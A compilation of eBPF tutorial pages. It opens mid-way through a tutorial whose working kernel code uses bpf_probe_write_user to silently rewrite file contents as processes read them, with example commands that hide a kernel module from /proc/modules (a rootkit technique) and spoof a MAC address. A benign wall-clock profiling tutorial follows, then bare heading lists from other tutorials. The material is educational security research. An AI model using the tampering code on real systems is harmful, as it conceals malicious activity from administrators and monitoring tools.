    unsigned int tofind_counter = 0;
    for (unsigned int i = 0; i < loop_size; i++) {
        // Read in chunks from buffer
        bpf_probe_read(&local_buff, read_size, (void*)buff_addr);
        for (unsigned int j = 0; j < LOCAL_BUFF_SIZE; j++) {
            // Look for the first char of our 'to find' text
            if (local_buff[j] == text_find[0]) {
                name_addr = buff_addr+j;
                // This is possibly out text, add the address to the map to be
                // checked by program 'check_possible_addrs'
                bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY);
                tofind_counter++;
            }
        }

        buff_addr += LOCAL_BUFF_SIZE;
    }

    // Tail-call into 'check_possible_addrs' to loop over possible addresses
    bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter);

    bpf_tail_call(ctx, &map_prog_array, PROG_01);
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int check_possible_addresses(struct trace_event_raw_sys_exit *ctx) {
    // Check this open call is opening our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
    if (pbuff_addr == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;
    long unsigned int* pName_addr = 0;
    long unsigned int name_addr = 0;
    unsigned int newline_counter = 0;
    unsigned int match_counter = 0;

    char name[text_len_max+1];
    unsigned int j = 0;
    char old = 0;
    const unsigned int name_len = text_len;
    if (name_len < 0) {
        return 0;
    }
    if (name_len > text_len_max) {
        return 0;
    }
    // Go over every possibly location
    // and check if it really does match our text
    for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) {
        newline_counter = i;
        pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter);
        if (pName_addr == 0) {
            break;
        }
        name_addr = *pName_addr;
        if (name_addr == 0) {
            break;
        }
        bpf_probe_read_user(&name, text_len_max, (char*)name_addr);
        // for (j = 0; j < text_len_max; j++) {
        //     if (name[j] != text_find[j]) {
        //         break;
        //     }
        // }
        // we can use bpf_strncmp here,
        // but it's not available in the kernel version older than 5.17
        if (bpf_strncmp(name, text_len_max, (const char *)text_find) == 0) {
            // ***********
            // We've found out text!
            // Add location to map to be overwritten
            // ***********
            bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY);
            match_counter++;
        }
        bpf_map_delete_elem(&map_name_addrs, &newline_counter);
    }

    // If we found at least one match, jump into program to overwrite text
    if (match_counter > 0) {
        bpf_tail_call(ctx, &map_prog_array, PROG_02);
    }
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int overwrite_addresses(struct trace_event_raw_sys_exit *ctx) {
    // Check this open call is opening our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
    if (pbuff_addr == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;
    long unsigned int* pName_addr = 0;
    long unsigned int name_addr = 0;
    unsigned int match_counter = 0;

    // Loop over every address to replace text into
    for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) {
        match_counter = i;
        pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter);
        if (pName_addr == 0) {
            break;
        }
        name_addr = *pName_addr;
        if (name_addr == 0) {
            break;
        }

        // Attempt to overwrite data with out replace string (minus the end null bytes)
        long ret = bpf_probe_write_user((void*)name_addr, (void*)text_replace, text_len);
        // Send event
        struct event *e;
        e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
        if (e) {
            e->success = (ret == 0);
            e->pid = pid;
            bpf_get_current_comm(&e->comm, sizeof(e->comm));
            bpf_ringbuf_submit(e, 0);
        }
        bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, text_find);

        // Clean up map now we're done
        bpf_map_delete_elem(&map_to_replace_addrs, &match_counter);
    }

    return 0;
}

The program starts with the familiar pattern of tracking file opens. When a process opens our target file (specified via the filename constant), we record its file descriptor in map_fds. This lets us identify reads from that specific file later.

The interesting part begins in handle_read_enter, where we capture the buffer address that userspace passed to the read() system call. This address is where the kernel will write the file contents, and crucially, it's also where we can modify them before the userspace process looks at the data.

The main logic lives in find_possible_addrs, attached to sys_exit_read. After the kernel completes the read operation, we scan through the buffer looking for potential matches. The constraint here is that we can't do unbounded loops—the verifier would reject that. So we read in chunks of LOCAL_BUFF_SIZE bytes and scan for the first character of our search string. Each potential match address goes into map_name_addrs.

Once we've scanned the buffer, we use a tail call to jump into check_possible_addresses. This program iterates through the potential matches and performs full string comparison using bpf_strncmp (available in kernel 5.17+). Confirmed matches move to map_to_replace_addrs. If we found any matches, we tail-call once more into overwrite_addresses.

The final stage, overwrite_addresses, performs the actual modification using bpf_probe_write_user. It loops through confirmed match locations and overwrites each one with the replacement text. The requirement that both strings have the same length prevents buffer corruption—we're doing in-place replacement without shifting any memory.

Tail Calls and Verifier Constraints

The use of tail calls (bpf_tail_call) is critical here. eBPF programs face strict complexity limits—the verifier analyzes every possible execution path to ensure the program terminates and doesn't access invalid memory. A single program that does scanning, matching, and replacement would exceed these limits.

Tail calls provide a way to chain programs while bypassing the cumulative instruction count. When find_possible_addrs calls bpf_tail_call(ctx, &map_prog_array, PROG_01), it's essentially jumping to a different program (check_possible_addresses) with the same context. The current program's execution ends, and the new program starts with a fresh instruction count budget.

The userspace loader must populate map_prog_array with file descriptors for the tail-called programs before attaching anything. This is done in the userspace code using bpf_map_update_elem, mapping index PROG_01 to the check_possible_addresses program and PROG_02 to overwrite_addresses.

This architecture demonstrates a key eBPF development pattern: when you hit verifier limits, split your logic into multiple programs and use tail calls to coordinate them.

Practical Examples and Security Implications

Let's look at real-world use cases. Hiding kernel modules from detection:

./replace -f /proc/modules -i 'joydev' -r 'cryptd'

When any process reads /proc/modules, they'll see cryptd where joydev actually appears. The module is still loaded and functioning, but tools like lsmod can't see it. This is a classic rootkit technique.

Spoofing MAC addresses for anti-sandbox evasion:

./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00'

Malware often checks for virtualization by looking at MAC address prefixes (0x00:15:5d indicates Hyper-V). By replacing the actual MAC address with zeros, the malware's virtualization detection fails, making sandbox analysis easier.

The defensive flip side is using this for honeypot systems. You can present fake credentials in configuration files, or make malware believe it successfully compromised a system when it hasn't. The file content on disk remains secure, but attackers reading it see false information.

Compilation and Execution

Compile the program:

cd src/27-replace
make

Run with specified file and text replacement:

sudo ./replace --filename /path/to/file --input foo --replace bar

Both input and replace must be the same length to avoid buffer corruption. To include newlines in bash, use $'\n':

./replace -f /proc/modules -i 'joydev' -r $'aaaa\n'

The program intercepts all reads of the specified file and replaces matching text transparently. Press Ctrl-C to stop.

Summary

This tutorial demonstrated how eBPF programs can intercept file read operations and modify data before userspace sees it, without altering the actual file. We explored the three-stage architecture using tail calls to work within verifier constraints, the use of bpf_probe_write_user for memory manipulation, and practical applications ranging from rootkit techniques to defensive honeypot deployment. Understanding these patterns is crucial for both offensive security research and building detection mechanisms that account for eBPF-based attacks.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Original bad-bpf project: https://github.com/pathtofile/bad-bpf
eBPF tail calls documentation: https://docs.kernel.org/bpf/prog_sk_lookup.html
BPF verifier and program complexity: https://www.kernel.org/doc/html/latest/bpf/verifier.html

eBPF Tutorial by Example 32: Wall Clock Profiling with Combined On-CPU and Off-CPU Analysis

云微 — Tue, 16 Dec 2025 07:16:59 +0000

Performance bottlenecks can hide in two very different places. Your code might be burning CPU cycles in hot loops, or it might be sitting idle waiting for I/O, network responses, or lock contention. Traditional profilers often focus on just one side of this story. But what if you could see both at once?

This tutorial introduces a complete wall clock profiling solution that combines on-CPU and off-CPU analysis using eBPF. We'll show you how to capture the full picture of where your application spends its time, using two complementary eBPF programs that work together to account for every microsecond of execution. Whether your performance problems come from computation or waiting, you'll be able to spot them in a unified flame graph view.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/32-wallclock-profiler

Understanding Wall Clock Profiling

Wall clock time is the actual elapsed time from start to finish, like checking a stopwatch. For any running process, this time gets divided into two categories. On-CPU time is when your code actively executes on a processor, doing real work. Off-CPU time is when your process exists but isn't running, waiting for something like disk I/O, network packets, or acquiring a lock.

Traditional CPU profilers only show you the on-CPU story. They sample the stack at regular intervals when your code runs, building a picture of which functions consume CPU cycles. But these profilers are blind to off-CPU time. When your thread blocks on a system call or waits for a mutex, the profiler stops seeing it. This creates a massive blind spot for applications that spend significant time waiting.

Off-CPU profilers flip the problem around. They track when threads go to sleep and wake up, measuring blocked time and capturing stack traces at blocking points. This reveals I/O bottlenecks and lock contention. But they miss pure computation problems.

The tools in this tutorial solve both problems by running two eBPF programs simultaneously. The oncputime tool samples on-CPU execution using perf events. The offcputime tool hooks into the kernel scheduler to catch blocking operations. A Python script combines the results, normalizing the time scales so you can see CPU-intensive code paths (marked red) and blocking operations (marked blue) in the same flame graph. This complete view shows where every microsecond goes.

Here's an example flame graph showing combined on-CPU and off-CPU profiling results:

In this visualization, you can clearly see the distinction between CPU-intensive work (shown in red/warm colors marked with _[c]) and blocking operations (shown in blue/cool colors marked with _[o]). The relative widths immediately reveal where your application spends its wall clock time.

The Tools: oncputime and offcputime

This tutorial provides two complementary profiling tools. The oncputime tool samples your process at regular intervals using perf events, capturing stack traces when code actively runs on the CPU. At a default rate of 49 Hz, it wakes up roughly every 20 milliseconds to record where your program is executing. Higher sample counts in the output indicate more CPU time spent in those code paths.

The offcputime tool takes a different approach. It hooks into the kernel scheduler's context switch mechanism, specifically the sched_switch tracepoint. When your thread goes off-CPU, the tool records a timestamp and captures the stack trace showing why it blocked. When the thread returns to running, it calculates how long the thread was sleeping. This directly measures I/O waits, lock contention, and other blocking operations in microseconds.

Both tools use BPF stack maps to efficiently capture kernel and user space call chains with minimal overhead. They aggregate results by unique stack traces, so repeated execution of the same code path gets summed together. The tools can filter by process ID, thread ID, and various other criteria to focus analysis on specific parts of your application.

Implementation: Kernel-Space eBPF Programs

Let's examine how these tools work at the eBPF level. We'll start with the on-CPU profiler, then look at the off-CPU profiler, and see how they complement each other.

On-CPU Profiling with oncputime

The on-CPU profiler uses perf events to sample execution at regular time intervals. Here's the complete eBPF program:

// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_tracing.h>
#include "oncputime.h"

const volatile bool kernel_stacks_only = false;
const volatile bool user_stacks_only = false;
const volatile bool include_idle = false;
const volatile bool filter_by_pid = false;
const volatile bool filter_by_tid = false;

struct {
    __uint(type, BPF_MAP_TYPE_STACK_TRACE);
    __type(key, u32);
} stackmap SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, struct key_t);
    __type(value, u64);
    __uint(max_entries, MAX_ENTRIES);
} counts SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, u8);
    __uint(max_entries, MAX_PID_NR);
} pids SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, u8);
    __uint(max_entries, MAX_TID_NR);
} tids SEC(".maps");

SEC("perf_event")
int do_perf_event(struct bpf_perf_event_data *ctx)
{
    u64 *valp;
    static const u64 zero;
    struct key_t key = {};
    u64 id;
    u32 pid;
    u32 tid;

    id = bpf_get_current_pid_tgid();
    pid = id >> 32;
    tid = id;

    if (!include_idle && tid == 0)
        return 0;

    if (filter_by_pid && !bpf_map_lookup_elem(&pids, &pid))
        return 0;

    if (filter_by_tid && !bpf_map_lookup_elem(&tids, &tid))
        return 0;

    key.pid = pid;
    bpf_get_current_comm(&key.name, sizeof(key.name));

    if (user_stacks_only)
        key.kern_stack_id = -1;
    else
        key.kern_stack_id = bpf_get_stackid(&ctx->regs, &stackmap, 0);

    if (kernel_stacks_only)
        key.user_stack_id = -1;
    else
        key.user_stack_id = bpf_get_stackid(&ctx->regs, &stackmap,
                            BPF_F_USER_STACK);

    valp = bpf_map_lookup_or_try_init(&counts, &key, &zero);
    if (valp)
        __sync_fetch_and_add(valp, 1);

    return 0;
}

char LICENSE[] SEC("license") = "GPL";

The program starts by defining several BPF maps. The stackmap is a special map type for storing stack traces. When you call bpf_get_stackid(), the kernel walks the stack and stores the instruction pointers in this map, returning an ID you can use to look it up later. The counts map aggregates samples by a composite key that includes both the process ID and the stack IDs. The pids and tids maps act as filters, letting you restrict profiling to specific processes or threads.

The main logic lives in the do_perf_event() function, which runs every time a perf event fires. The user space program sets up these perf events at a specific frequency (default 49 Hz), one per CPU core. When a CPU triggers its timer, this function executes on whatever process happens to be running at that moment. It first extracts the process and thread IDs from the current task, then applies any configured filters. If the current thread should be sampled, it builds a key structure that includes the process name and stack traces.

The two calls to bpf_get_stackid() capture different pieces of the execution context. The first call without flags gets the kernel stack, showing what kernel functions were active. The second call with BPF_F_USER_STACK gets the user space stack, showing your application's function calls. These stack IDs go into the key, and the program increments a counter for that unique combination. Over time, hot code paths get sampled more frequently, building up higher counts.

Off-CPU Profiling with offcputime

The off-CPU profiler hooks into the scheduler to measure blocking time. Here's the complete eBPF program:

// SPDX-License-Identifier: GPL-2.0
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_tracing.h>
#include "offcputime.h"

#define PF_KTHREAD      0x00200000

const volatile bool kernel_threads_only = false;
const volatile bool user_threads_only = false;
const volatile __u64 max_block_ns = -1;
const volatile __u64 min_block_ns = 0;
const volatile bool filter_by_tgid = false;
const volatile bool filter_by_pid = false;
const volatile long state = -1;

struct internal_key {
    u64 start_ts;
    struct key_t key;
};

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, u32);
    __type(value, struct internal_key);
    __uint(max_entries, MAX_ENTRIES);
} start SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_STACK_TRACE);
    __uint(key_size, sizeof(u32));
} stackmap SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, struct key_t);
    __type(value, struct val_t);
    __uint(max_entries, MAX_ENTRIES);
} info SEC(".maps");

static bool allow_record(struct task_struct *t)
{
    u32 tgid = BPF_CORE_READ(t, tgid);
    u32 pid = BPF_CORE_READ(t, pid);

    if (filter_by_tgid && !bpf_map_lookup_elem(&tgids, &tgid))
        return false;
    if (filter_by_pid && !bpf_map_lookup_elem(&pids, &pid))
        return false;
    if (user_threads_only && (BPF_CORE_READ(t, flags) & PF_KTHREAD))
        return false;
    else if (kernel_threads_only && !(BPF_CORE_READ(t, flags) & PF_KTHREAD))
        return false;
    if (state != -1 && get_task_state(t) != state)
        return false;
    return true;
}

static int handle_sched_switch(void *ctx, bool preempt, struct task_struct *prev, struct task_struct *next)
{
    struct internal_key *i_keyp, i_key;
    struct val_t *valp, val;
    s64 delta;
    u32 pid;

    if (allow_record(prev)) {
        pid = BPF_CORE_READ(prev, pid);
        if (!pid)
            pid = bpf_get_smp_processor_id();
        i_key.key.pid = pid;
        i_key.key.tgid = BPF_CORE_READ(prev, tgid);
        i_key.start_ts = bpf_ktime_get_ns();

        if (BPF_CORE_READ(prev, flags) & PF_KTHREAD)
            i_key.key.user_stack_id = -1;
        else
            i_key.key.user_stack_id = bpf_get_stackid(ctx, &stackmap, BPF_F_USER_STACK);
        i_key.key.kern_stack_id = bpf_get_stackid(ctx, &stackmap, 0);
        bpf_map_update_elem(&start, &pid, &i_key, 0);
        bpf_probe_read_kernel_str(&val.comm, sizeof(prev->comm), BPF_CORE_READ(prev, comm));
        val.delta = 0;
        bpf_map_update_elem(&info, &i_key.key, &val, BPF_NOEXIST);
    }

    pid = BPF_CORE_READ(next, pid);
    i_keyp = bpf_map_lookup_elem(&start, &pid);
    if (!i_keyp)
        return 0;
    delta = (s64)(bpf_ktime_get_ns() - i_keyp->start_ts);
    if (delta < 0)
        goto cleanup;
    if (delta < min_block_ns || delta > max_block_ns)
        goto cleanup;
    delta /= 1000U;
    valp = bpf_map_lookup_elem(&info, &i_keyp->key);
    if (!valp)
        goto cleanup;
    __sync_fetch_and_add(&valp->delta, delta);

cleanup:
    bpf_map_delete_elem(&start, &pid);
    return 0;
}

SEC("tp_btf/sched_switch")
int BPF_PROG(sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)
{
    return handle_sched_switch(ctx, preempt, prev, next);
}

char LICENSE[] SEC("license") = "GPL";

The off-CPU profiler is more complex because it needs to track timing across multiple events. The start map stores timestamps and stack information for threads that go off-CPU. When a thread blocks, we record when it happened and why (the stack trace). When that same thread returns to running, we calculate how long it was blocked.

The scheduler switch happens many times per second on a busy system, so performance matters. The allow_record() function quickly filters out threads we don't care about before doing expensive operations. If a thread passes the filter, the program captures the current timestamp using bpf_ktime_get_ns() and records the stack traces showing where the thread blocked.

The key insight is in the two-stage approach. The prev task (the thread going off-CPU) gets its blocking point recorded with a timestamp. When the scheduler later switches to the next task (a thread waking up), we look up whether we previously recorded this thread going to sleep. If we find a record, we calculate the delta between now and when it went to sleep. This delta is the off-CPU time in nanoseconds, which we convert to microseconds and add to the accumulated total for that stack trace.

User-Space Programs: Loading and Processing

Both tools follow a similar pattern in user space. They use libbpf to load the compiled eBPF object file and attach it to the appropriate event. For oncputime, this means setting up perf events at the desired sampling frequency. For offcputime, it means attaching to the scheduler tracepoint. The user space programs then periodically read the BPF maps, resolve the stack IDs to actual function names using symbol tables, and format the output.

The symbol resolution is handled by the blazesym library, which parses DWARF debug information from binaries. When you see a stack trace with function names and line numbers, that's blazesym converting raw instruction pointer addresses into human-readable form. The user space programs output in "folded" format, where each line contains a semicolon-separated stack trace followed by a count or time value. This format feeds directly into flame graph generation tools.

Combining On-CPU and Off-CPU Profiles

The real power comes from running both tools together and merging their results. The wallclock_profiler.py script orchestrates this process. It launches both profilers simultaneously on the target process, waits for them to complete, and then combines their outputs.

The challenge is that the two tools measure different things in different units. The on-CPU profiler counts samples (49 per second by default), while the off-CPU profiler measures microseconds. To create a unified view, the script normalizes the off-CPU time to equivalent sample counts. If sampling at 49 Hz, each sample represents about 20,408 microseconds of potential execution time. The script divides off-CPU microseconds by this value to get equivalent samples.

After normalization, the script adds annotations to distinguish the two types of time. On-CPU stack traces get a _[c] suffix (for compute), while off-CPU stacks get _[o] (for off-CPU or blocking). A custom color palette in the flame graph tool renders these different colors, red for CPU time and blue for blocking time. The result is a single flame graph where you can see both types of activity and their relative magnitudes.

The script also handles multi-threaded applications by profiling each thread separately. It detects threads at startup, launches parallel profiling sessions for each one, and generates individual flame graphs showing per-thread behavior. This helps identify which threads are busy versus idle, and whether your parallelism is effective.

Compilation and Execution

Building the tools requires a standard eBPF development environment. The tutorial repository includes all dependencies in the src/third_party/ directory. To build:

cd src/32-wallclock-profiler
make

The Makefile compiles the eBPF C code with clang, generates skeletons with bpftool, builds the blazesym symbol resolver, and links everything with libbpf to create the final executables.

To use the individual tools:

# Profile on-CPU execution for 30 seconds
sudo ./oncputime -p <PID> -F 99 30

# Profile off-CPU blocking for 30 seconds
sudo ./offcputime -p <PID> -m 1000 30

# Use the combined profiler (recommended)
sudo python3 wallclock_profiler.py <PID> -d 30 -f 99

Let's try profiling a test program that does both CPU work and blocking I/O:

# Build and run the test program
cd tests
make
./test_combined &
TEST_PID=$!

# Profile it with the combined profiler
cd ..
sudo python3 wallclock_profiler.py $TEST_PID -d 30

# This generates:
# - combined_profile_pid<PID>_<timestamp>.folded (raw data)
# - combined_profile_pid<PID>_<timestamp>.svg (flame graph)
# - combined_profile_pid<PID>_<timestamp>_single_thread_analysis.txt (time breakdown)

The output flame graph will show red frames for the cpu_work() function consuming CPU time, and blue frames for the blocking_work() function spending time in sleep. The relative widths show how much wall clock time each consumes.

For multi-threaded applications, the profiler creates a directory with per-thread results:

# Profile a multi-threaded application
sudo python3 wallclock_profiler.py <PID> -d 30

# Output in multithread_combined_profile_pid<PID>_<timestamp>/
# - thread_<TID>_main.svg (main thread flame graph)
# - thread_<TID>_<role>.svg (worker thread flame graphs)
# - *_thread_analysis.txt (time analysis for all threads)

The analysis files show time accounting, letting you verify that on-CPU plus off-CPU time adds up correctly to the wall clock profiling duration. Coverage percentages help identify if threads are mostly idle or if you're missing data.

Interpreting the Results

When you open the flame graph SVG in a browser, each horizontal box represents a function in a stack trace. The width shows how much time was spent there. Boxes stacked vertically show the call chain, with lower boxes calling higher ones. Red boxes indicate on-CPU time, blue boxes show off-CPU time.

Look for wide red sections to find CPU bottlenecks. These are functions burning through cycles in tight loops or expensive algorithms. Wide blue sections indicate blocking operations. Common patterns include file I/O (read/write system calls), network operations (recv/send), and lock contention (futex calls).

The flame graph is interactive. Click any box to zoom in and see details about that subtree. The search function lets you highlight all frames matching a pattern, useful for finding specific functions or libraries. Hovering shows the full function name and exact sample count or time value.

Pay attention to the relative proportions. An application that's 90% blue is I/O bound and probably won't benefit much from CPU optimization. One that's mostly red is CPU bound. Applications split evenly between red and blue might benefit from overlapping computation and I/O, such as using asynchronous I/O or threading.

For multi-threaded profiles, compare the per-thread flame graphs. Ideally, worker threads should show similar patterns if the workload is balanced. If one thread is mostly red while others are mostly blue, you might have load imbalance. If all threads show lots of blue time in futex waits with similar stacks, that's lock contention.

Summary

Wall clock profiling with eBPF gives you complete visibility into application performance by combining on-CPU and off-CPU analysis. The on-CPU profiler samples execution to find hot code paths that consume CPU cycles. The off-CPU profiler hooks into the scheduler to measure blocking time and identify I/O bottlenecks or lock contention. Together, they account for every microsecond of wall clock time, showing where your application actually spends its life.

The tools use eBPF's low-overhead instrumentation to collect this data with minimal impact on the target application. Stack trace capture and aggregation happen in the kernel, avoiding expensive context switches. The user space programs only need to periodically read accumulated results and resolve symbols, making the overhead negligible even for production use.

By visualizing both types of time in a single flame graph with color coding, you can quickly identify whether problems are computational or blocking in nature. This guides optimization efforts more effectively than traditional profiling approaches that only show one side of the picture. Multi-threaded profiling support reveals parallelism issues and thread-level bottlenecks.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

Reference

BCC libbpf-tools offcputime: https://github.com/iovisor/bcc/tree/master/libbpf-tools
BCC libbpf-tools profile: https://github.com/iovisor/bcc/tree/master/libbpf-tools
Blazesym symbol resolution: https://github.com/libbpf/blazesym
FlameGraph visualization: https://github.com/brendangregg/FlameGraph
"Off-CPU Analysis" by Brendan Gregg: http://www.brendangregg.com/offcpuanalysis.html
Coz: Finding Code that Counts with Causal Profiling (ASPLOS'15): https://dl.acm.org/doi/10.1145/2815400.2815409
wPerf: Generic Off-CPU Analysis (OSDI'18): https://www.usenix.org/system/files/osdi18-zhou.pdf
Identifying On-/Off-CPU Bottlenecks with Blocked Samples (OSDI'24): https://www.usenix.org/system/files/osdi24-ahn.pdf
The Flame Graph (CACM'16): https://queue.acm.org/detail.cfm?id=2927301
Systems Research is Running out of Time (HotOS'21): https://sigops.org/s/conferences/hotos/2021/papers/hotos21-s04-najafi.pdf
Time-Sensitive Linux (OSDI'02): https://www.usenix.org/legacy/event/osdi02/tech/full_papers/goel/goel.pdf
Profiling and Tracing Support for Java Applications (ICPE'19): https://research.spec.org/icpe_proceedings/2019/proceedings/p119.pdf
eBPF Performance Analysis (SIGCOMM'24): https://www.brendangregg.com/Slides/SIGCOMM2024_eBPF_Performance.pdf

The original link of this article: https://eunomia.dev/tutorials/32-wallclock-profiler

Forem: 云微

eBPF Tutorial by Example: BPF Token for Delegated Privilege and Secure Program Loading

Introduction to BPF Token: Solving the Privilege Problem

The Problem: All-or-Nothing BPF Capabilities

The Solution: Scoped Delegation Through bpffs

The User Namespace Constraint

How libbpf Makes It Transparent

Writing the eBPF Program

User-Space Loader: Token-Backed Loading

The Namespace Orchestrator: token_userns_demo

Step 1: Fork and Create Namespaces

Step 2: Create bpffs and Configure Delegation

Step 3: Mount and Load

Preparing a bpffs Mount Manually

Compilation and Execution

Real-World Applications

Summary

References

eBPF Tutorial: cgroup-based Policy Control

What is cgroup eBPF?

cgroup eBPF Hook Points

1. BPF_PROG_TYPE_CGROUP_SOCK_ADDR - Socket Address Hooks

2. BPF_PROG_TYPE_CGROUP_DEVICE - Device Access Control

3. BPF_PROG_TYPE_CGROUP_SYSCTL - Sysctl Access Control

4. Other cgroup Hooks

This Tutorial: cgroup Policy Guard

Implementation

Shared Header: cgroup_guard.h

eBPF Program: cgroup_guard.bpf.c

Understanding the BPF Code

Userspace Loader: cgroup_guard.c

Understanding the Userspace Code

Building

Running

Terminal A: Start the loader

Terminal B: Start test servers (outside cgroup)

Terminal C: Test from within the cgroup

Terminal A output (events)

One-click Test

Verifying with bpftool

When to Use cgroup eBPF

Summary

References

eBPF Tutorial by Example: BPF Dynamic Pointers for Variable-Length Data

Introduction to BPF Dynamic Pointers

The Problem: When Static Verification Isn't Enough

The Solution: Runtime-Checked Dynamic Pointers

Dynptr API Overview

Helpers vs Kfuncs

Creating Dynptrs

Reading and Writing

Slicing for Packet Parsing

Ring Buffer Lifecycle

Implementation: TC Ingress with Dynptr Parsing and Variable-Length Events

Complete BPF Program: dynptr_tc.bpf.c

Understanding the BPF Code

Complete User-Space Program: dynptr_tc.c

Understanding the User-Space Code

Compilation and Execution

Creating a Test Environment

Running the Demo

Testing the Drop Policy

Using the Test Script

When to Use Dynptrs

Summary

References

A Taxonomy of GPU Bugs: 19 Defect Classes for CUDA Verification

Introduction

Taxonomy Overview

Why These Dimensions Matter for GPU Extension Verifiers

Understanding Soundness vs. Completeness

Insights from a Taxonomy of GPU Defects

Insights from Verification Scope and Assurance Analysis

Canonical bug list

1) Barrier Divergence at Block Barriers (__syncthreads) [Safety, GPU-specific]

What it is / why it matters

Bug example

Seen in / checked by

Checking approach

Verification strategy

The Namespace Orchestrator: `token_userns_demo`

1. `BPF_PROG_TYPE_CGROUP_SOCK_ADDR` - Socket Address Hooks

2. `BPF_PROG_TYPE_CGROUP_DEVICE` - Device Access Control

3. `BPF_PROG_TYPE_CGROUP_SYSCTL` - Sysctl Access Control

1) Barrier Divergence at Block Barriers (`__syncthreads`) [Safety, GPU-specific]

2) Invalid Warp Synchronization (`__syncwarp` mask, warp-level barriers) [Safety, GPU-specific]

11) Shared-Memory Data Races (`shared`) [Correctness, GPU-specific]